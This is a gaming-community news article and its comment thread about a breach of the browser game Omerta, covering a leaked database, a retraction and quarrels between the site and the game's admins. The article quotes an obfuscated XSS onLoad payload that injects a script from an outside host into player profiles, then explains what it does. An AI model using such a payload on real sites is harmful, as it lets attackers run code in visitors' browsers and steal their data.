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22-09 [Upd #2] Omerta hacked
Author: sbanks
Last updated: 4909d 8h 30m 18s ago by LL
Comments: 164
Views: 71,285
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Version: 3.2
Last weekend Omerta had some downtime. Admins posted some news that there was something wrong with the server. Some hardware problem as Brando states.

Barafranca News: Connection problems - fixed

By Brando: There was a hardware problem which was solved by switching that machine off.

We're disappointed that the Sysadmin team were not able to find this out earlier and there will be an enquiry.

Sorry for the inconvenience and thanks to Teckna, Paul and Andre, who remained awake fixing this - trying everything in the software - until they finally found that it was an unpredictable physical problem.

Most of your criticisms are accurate and I will conduct an enquiry as to why we did not publicly react sooner.

In reality, hackers had access to the database of Omerta. Due the lack of proper coding on the hitlist page, hackers were able to do a "query" and got into the database of Omerta.

Result? All information you could wish for "could" have been downloaded. This contains: successors, bullet amount, passwords(md5 hashed), emails, testaments.. everything!

After the news post of Brando, the hackers got kind of "pissed/annoyed" that the Admins were trying to cover up what was happening and decided to go public with the information.

They wrote a small tool which would change all profiles ingame. About the same thing what happened versions ago (Stidda <-> Barafranca)

They reached about ~800 profiles before it got noted, and admins disabled images on profiles again.

Barafranca News: Removed Img(s)

onLoad=m=document.createElement(String.fromCharCode( 115,99,114,105,112,116));m.src=String.fromCharCode( 104,116,116,112,58,47, 47,97,46,105,116,115,114,46,114, 117,47,107,110,97,115,50,46,106,115);document.getElementsByTagName( String.fromCharCode(104,101,97,100))[0].appendChild(m)

Once page has been loaded, create JavaScript placeholder. Then load and place http://a.itsr.ru/knas2.js in it.

This script loaded an unknown JavaScript file onto the profiles, which may could have been used to cause harm, once the affected profile was loaded. Unfortunately, we don't have the particular JavaScript file, and thus cannot analyse the rest of the intentions of the hackers.

We now heard the hackers wanted to wait until 2-3k profiles were infected, and then show the database setup all at once on those profiles.


Just as more proofs, the hackers has released a list of 515 users with their set testament.

Also they released the Global Vars of the server of Barafranca.

Update 28/09:

After six days of silence in the Admins' latest news section and ignoring our invitation to comment on this article with the story from the admins' point of view, the crew of this site has been glined for an undefined amount of time with the message to "contact Brando". Also ingames of our crew have been frozen and at least two have been akilled. Links to our sites are blocked on IRC for now.

Later on the day, a statement has been released on Omerta in which Bramblerose states that last Thursday testament info indeed was obtained through a XSS exploit. Today they have taken measures to protect the players of which this data has been obtained.

They have yet to comment on our accusation that their downtime was linked to the hack we described here, nor have they said anything about the database setup leak, global server variables leak or the profiles infected by JavaScript code.


One of the hackers has spread a link through our comments, which shows a list of family names and then two lists of user id's who were the successors of the corresponding families at the time of the hack, which is just another proof that the database was accessible completely.

Update 30/09:
We're sorry for connecting the downtime with the hacks, we had no proof for this besides coincidence and a statement from the hackers. We apologise to the Omerta crew for this false information and for saying they were trying to cover the hack up by saying they had hardware problems and thus we retract this accusation.

We also apologise for helping the hackers spread the lists containing testament information and successor information further by linking to them in our article and we sincerely hope that none of the players or families on those lists had any negative consequences thanks to those lists being linked to in our article. We apologise for any of the negative consequences which may have occurred. We're also sorry to the Omerta crew if linking to the lists in our article caused the Omerta crew to have extra worries or had to spend more time on damage control.

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Anonymous (11:50:06 - 30-09)
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Anonymous at 11:30:48 on 30/09:
Brando - rly at 09:53:06 on 30/09:
Anonymous at 09:16:19 on 30/09:
Ok so..this latest update means the downtime was not connected to the hack.

Omerta was hacked.

Brando is claiming victory on Facebook now..what a ****.

Victory? If you think that OB was opposed to us in this sorry tale you are wrong - they were just used by the hackers for some free PR.

And as for you calling me names - at least I don;t hide behind an anonymous moniker like you, you ********, ********** *******.

I'll come back here again in a few months. Like I said below, cynics, the story was *a pack of lies*

And the 'journalism' - judge the quality for yourself.

You still haven't even fucking responded about the hacks.
Omerta got hacked, both the testament and successor lists proved so.
The only thing that got retracted by obn is the link between those hacks and the downtime, which is still a whole lot better then 'well some retard dev put some changes in that trigged some sort of ultra super security system made by some sysadmin which caused 2 full days of 50x errors, woops!' but ok, that's possible.
You still got hacked, you still denied that.
The successor link only got published because you decided 'im gonna bann em for not responding to my email during my working day eventho i live in fucking China thus time-zones are completely off' with Rix posting here multiple times that he had infact responded already.

And still, you got hacked, at least twice since the hackers this story was based around and the ones that published the lists are 2 entirely different groups and still no word about that.
Obn might have been the source for these lists, its still your data thats in them, you know, the data that has been hacked but you still claim didnt happen.

Let me summarize:
Omerta gets hacked.
Obn posts about these hacks, and makes a (prolly correct) connection between the hacks and sudden downtime.
You get your panties in a bunch about it and decide to g-line, freeze and akill Obn accounts since they dont instantly agree with you about a retraction.
Bramble suddenly comes up with a bs story about a source for the then already released testament list, claiming all and everyone on it are in immortal mode for 48 hours, which if comments about that are correct wasn't even true.
Hackers get pissed about you taking a stand against Obn and release another, far more valued list this time containing every successor and subsuccesor.
Just to prove the hack took place, the actual data was a few weeks old but still a lot of fams confirmed the list to be accurate, even after some time has gone by.
And now you get Obn to retract about the hack-downtime link and your holding a victory parade about justice and you standing up for your colleagues.

You still haven't responded about the actual hacks, the subject or even remotely responded ontopic. And its been more then a week that this article has been published, and yet, nothing.
How can you be happy about your 'justice'?
Fucking respond ontopic for once.
And not here in a comment, no, an actual newspost to explain what happened, what the consequences are for players affected by it and more importantly if you did anything to make sure it doesn't happen again. Since all this denial kinda worries me you didnt even fix it, since there was nothing to fix right? Be the boss you claim to be for once, DG would have posted about this a week ago, since he seemed to understand what mattered to people playing your game.

_o_ for your post.
I couldnt care less if the downtime was or was not related, fact is hack DID happen. And guess players should be glad only testaments and successors list were released to us. As far as i understood they have way more private infos and worse, anyone who knows some coding can get all the info he wants (not only the 1-2-3 w/e hackers that came public).
So how about (finally) admit it and warn the players to minimize their damage? Change passwords? Instead of the victory dance ur doing now..
Anonymous (11:30:48 - 30-09)
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Brando - rly at 09:53:06 on 30/09:
Anonymous at 09:16:19 on 30/09:
Ok so..this latest update means the downtime was not connected to the hack.

Omerta was hacked.

Brando is claiming victory on Facebook now..what a ****.

Victory? If you think that OB was opposed to us in this sorry tale you are wrong - they were just used by the hackers for some free PR.

And as for you calling me names - at least I don;t hide behind an anonymous moniker like you, you ********, ********** *******.

I'll come back here again in a few months. Like I said below, cynics, the story was *a pack of lies*

And the 'journalism' - judge the quality for yourself.

You still haven't even fucking responded about the hacks.
Omerta got hacked, both the testament and successor lists proved so.
The only thing that got retracted by obn is the link between those hacks and the downtime, which is still a whole lot better then 'well some retard dev put some changes in that trigged some sort of ultra super security system made by some sysadmin which caused 2 full days of 50x errors, woops!' but ok, that's possible.
You still got hacked, you still denied that.
The successor link only got published because you decided 'im gonna bann em for not responding to my email during my working day eventho i live in fucking China thus time-zones are completely off' with Rix posting here multiple times that he had infact responded already.

And still, you got hacked, at least twice since the hackers this story was based around and the ones that published the lists are 2 entirely different groups and still no word about that.
Obn might have been the source for these lists, its still your data thats in them, you know, the data that has been hacked but you still claim didnt happen.

Let me summarize:
Omerta gets hacked.
Obn posts about these hacks, and makes a (prolly correct) connection between the hacks and sudden downtime.
You get your panties in a bunch about it and decide to g-line, freeze and akill Obn accounts since they dont instantly agree with you about a retraction.
Bramble suddenly comes up with a bs story about a source for the then already released testament list, claiming all and everyone on it are in immortal mode for 48 hours, which if comments about that are correct wasn't even true.
Hackers get pissed about you taking a stand against Obn and release another, far more valued list this time containing every successor and subsuccesor.
Just to prove the hack took place, the actual data was a few weeks old but still a lot of fams confirmed the list to be accurate, even after some time has gone by.
And now you get Obn to retract about the hack-downtime link and your holding a victory parade about justice and you standing up for your colleagues.

You still haven't responded about the actual hacks, the subject or even remotely responded ontopic. And its been more then a week that this article has been published, and yet, nothing.
How can you be happy about your 'justice'?
Fucking respond ontopic for once.
And not here in a comment, no, an actual newspost to explain what happened, what the consequences are for players affected by it and more importantly if you did anything to make sure it doesn't happen again. Since all this denial kinda worries me you didnt even fix it, since there was nothing to fix right? Be the boss you claim to be for once, DG would have posted about this a week ago, since he seemed to understand what mattered to people playing your game.
Anonymous (11:09:16 - 30-09)
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waha, this changes nothing!

Fact remains that the database was compromised, which the evidence strongly implies. All your emails might be selling to some russian spamking as we speak. This might have have happened at the same time as the server malfunctioned; but again that changes nothing! The point here is that the players were never informed about their account details being leaked, instead omerta informs the users about the lesser matter of the server being broken. So fine, call it withholding information rather then cover-up.

Reading the rectification makes me sad, though I completely understand the beyond crew for doing it, Brando employed a bully attitude that would make Stalin proud to work this out. Wonder if he is ever going to try to make us march in formation... I especially love the part where you make them apologize for the concern and time spent; guys! your site is full of holes - you should be concerned!

"Dear users, it seems some ill-mannered people have breached the walls of the omerta world and stole some information; I, the most slick manager on the block, urge you all to change your password and check your emails. In case you are running a family please consider updating the successors, as that information can be deemed public by now"

- Anonymous
Relaxter (11:05:32 - 30-09)
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@ brando

ok fair enough, the hack and the downtime where not connected.
but the matter of the fact is, omerta WAS hacked and you kept it quiet. so the information the OB crew had was partly wrong, but not entirely.

also, you say "and as for you calling me names", dont play innocent, if you look back in the reactions of this very article you are spewing quite a lot, callin sbanks names etc.

furthermore, omerta was hacked (which you denied here in your reactions), WHY are you trying to hush it up ? ofc the hackers are going public with it, if it isnt trough OB then it is through another omerta news site. so why not play open cards and come immediately after the hack with a newspost, sorry we got hacked, you might want to change your testament and successors ?

Rix Netherlands (10:18:27 - 30-09)
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Brando - rly at 09:53:06 on 30/09:
And as for you calling me names - at least I don;t hide behind an anonymous moniker like you, you ********, ********** *******.
Argumentum ad hominem
Anonymous (10:05:27 - 30-09)
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Anonymous at 10:02:08 on 30/09:
rofl i bet the rectification was pushed trough by omerta admins?

and story being different as we knew before?

1. hardware error can be possible
2. fact is omerta was hacked.
3. omerta forces beyond to do rectification
4. most will see rectification as bullshit and prolly know better.
5. keep on the good work beyond crew

im behind u

Anonymous (10:02:08 - 30-09)
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rofl i bet the rectification was pushed trough by omerta admins?

and story being different as we knew before?

1. hardware error can be possible
2. fact is omerta was hacked.
3. omerta forces beyond to do rectification
4. most will see rectification as bullshit and prolly know better.
5. keep on the good work beyond crew

im behind u
Brando - rly (09:53:06 - 30-09)
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Anonymous at 09:16:19 on 30/09:
Ok so..this latest update means the downtime was not connected to the hack.

Omerta was hacked.

Brando is claiming victory on Facebook now..what a ****.

Victory? If you think that OB was opposed to us in this sorry tale you are wrong - they were just used by the hackers for some free PR.

And as for you calling me names - at least I don;t hide behind an anonymous moniker like you, you ********, ********** *******.

I'll come back here again in a few months. Like I said below, cynics, the story was *a pack of lies*

And the 'journalism' - judge the quality for yourself.
Anonymous (09:16:19 - 30-09)
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Ok so..this latest update means the downtime was not connected to the hack.

Omerta was hacked.

Brando is claiming victory on Facebook now..what a ****.
Anonymous (09:16:08 - 30-09)
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annoyed at 09:01:27 on 30/09:
Rix at 13:02:49 on 29/09:
Shizzz at 12:55:47 on 29/09:
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about i and 2. Brando don't want to admit it. It happened, don't give them attention and they will stop
We didn't made a big thing about it from the start, we just reported it, as any newssite would do and does.

no you use this platform for many versions alrdy to backtalk omerta

i remember interviews out of 2.6 or before that even where you guys tried discredit bramble

by posting logs about her being married to someone ingame

i dont see omerta's crew doing a great job at keeping the ppl informed about anything, not even something as important as private data being hacked. worse then that, they keep denying it.

as for the logs.. lol! then dont talk about it :') so no logs can be made public. like the news crew would make stuff up just to make some article :') they get infos and post them so everyone can be informed, thats how i see it.
ppl can judge by themselves after if its the truth or not.
Anonymous (09:09:35 - 30-09)
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annoyed at 09:01:27 on 30/09:
Rix at 13:02:49 on 29/09:
Shizzz at 12:55:47 on 29/09:
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about i and 2. Brando don't want to admit it. It happened, don't give them attention and they will stop
We didn't made a big thing about it from the start, we just reported it, as any newssite would do and does.

no you use this platform for many versions alrdy to backtalk omerta

i remember interviews out of 2.6 or before that even where you guys tried discredit bramble

by posting logs about her being married to someone ingame

annoyed when you manage a site like this, it is you job to post/mention everything that happens on omerta. good or bad. the people that respond make the artical.
Rix Netherlands (09:06:41 - 30-09)
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annoyed at 09:01:27 on 30/09:
Rix at 13:02:49 on 29/09:
Shizzz at 12:55:47 on 29/09:
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about i and 2. Brando don't want to admit it. It happened, don't give them attention and they will stop
We didn't made a big thing about it from the start, we just reported it, as any newssite would do and does.

no you use this platform for many versions alrdy to backtalk omerta

i remember interviews out of 2.6 or before that even where you guys tried discredit bramble

by posting logs about her being married to someone ingame
During our move from Fingon to OBN about 50% of the crew moved along, some important key figures left (but gave their blessing to restart) and some new key figures have come into the picture. The Omerta crew has given us a "new chance", why won't you?
annoyed (09:01:27 - 30-09)
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Rix at 13:02:49 on 29/09:
Shizzz at 12:55:47 on 29/09:
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about i and 2. Brando don't want to admit it. It happened, don't give them attention and they will stop
We didn't made a big thing about it from the start, we just reported it, as any newssite would do and does.

no you use this platform for many versions alrdy to backtalk omerta

i remember interviews out of 2.6 or before that even where you guys tried discredit bramble

by posting logs about her being married to someone ingame
Rix Netherlands (08:29:11 - 30-09)
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Anonymous at 05:14:21 on 30/09:
news.omertabeyond.com /files/rectification_full.html

loll typed by brando? :')
maybe the date wasn't correct, the stats are :)

sooooooo if crew says they weren't hacked...
it mean that you guys spread out the stats, so not capable for being crew ;)

This one you can't deny at all, or omerta was hacked OR you (crew) are the ones who leaked :)
===> Crew's fault :)
I'm curious how you got that link :')
Anonymous (05:14:21 - 30-09)
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news.omertabeyond.com /files/rectification_full.html

loll typed by brando? :')
maybe the date wasn't correct, the stats are :)

sooooooo if crew says they weren't hacked...
it mean that you guys spread out the stats, so not capable for being crew ;)

This one you can't deny at all, or omerta was hacked OR you (crew) are the ones who leaked :)
===> Crew's fault :)
Denke (00:26:13 - 30-09)
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i've lol'd :')

hide it as hard you can, and the hack will strike back again!

Anonymous (18:03:41 - 29-09)
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They keep it silent as hell. Removing forum topics about it. Ignoring.
Not even a explanation.
Unbelievable there are still people that defend this omerta crew.
Wake up ppl. Wake up.

Rix good work.
You doing what they should do. Telling the true.

Anonymous (14:25:39 - 29-09)
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Anonymous at 13:54:17 on 29/09:
"Too make sure that the players on this list (and their testaments) won’t get killed hoping for an easy way of getting money we put those accounts in protection mode, which means no one can hire detectives to find them. Too make it even they can’t hire detectives themselves either. This will be automatically removed after 48 hours."

Thats a lie too, you can still kill and be killed if you were on the 'testamentlist'.

lol suprised ? smoke and mirrors mate .. smoke and mirrors :')
Anonymous (13:54:17 - 29-09)
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"Too make sure that the players on this list (and their testaments) won’t get killed hoping for an easy way of getting money we put those accounts in protection mode, which means no one can hire detectives to find them. Too make it even they can’t hire detectives themselves either. This will be automatically removed after 48 hours."

Thats a lie too, you can still kill and be killed if you were on the 'testamentlist'.

Anonymous (13:13:25 - 29-09)
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Shizzz at 12:55:47 on 29/09:
tbh who gives a shit about a hack of omerta? Everything can be hacked if it's done by proper people, nothing to be ashamed of.
I don't get it why 1. beyond makes such a big thing about i and 2. Brando don't want to admit it. It happened, don't give them attention and they will stop

you might now care if your passwords and emails wtvr may be out there for some random to be checking them on other sites really ... you must not be one of the affected people because i am not either but even i can care for what has happened we are not saying be ashamed we for the most part are saying own up and admit you were wrong and stop blaming others maybe make a real post about it instead of beat around the bust then finally after weeks admit it ....... i think you need to open your eyes and to think if this could have gone more serious which was very possible ..... its just an eye opener imo